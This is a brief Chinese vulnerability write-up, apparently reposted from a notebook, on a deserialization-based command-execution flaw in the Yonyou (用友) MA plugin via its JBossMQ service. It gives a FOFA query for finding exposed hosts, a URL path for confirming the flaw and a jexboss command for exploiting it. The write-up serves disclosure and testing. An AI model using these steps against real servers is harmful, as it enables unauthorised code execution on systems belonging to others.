登录 白背景

用友MA插件存在命令执行漏洞

一、漏洞简介

用友MA-插件存在命令执行漏洞,该漏洞源于用友MA-插件管理默认开启JBossMQ服务,该服务存在反序列化漏洞,攻击者可利用该漏洞执行任意代码。

二、影响版本

  • 用友MA插件

三、资产测绘

  • fofaapp="用友-MA插件"
  • 特征

image.png

四、漏洞复现

在url后面添加如下地址:/jbossmq-httpil/HTTPServerILServlet,出现如下页面即证明存在JbossMQ反序列化漏洞
image.png
使用工具利用
jexboss-master.zip

python3 jexboss.py -host http://xx.xx.xx.xx/

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/lcpkvfuqq52niqio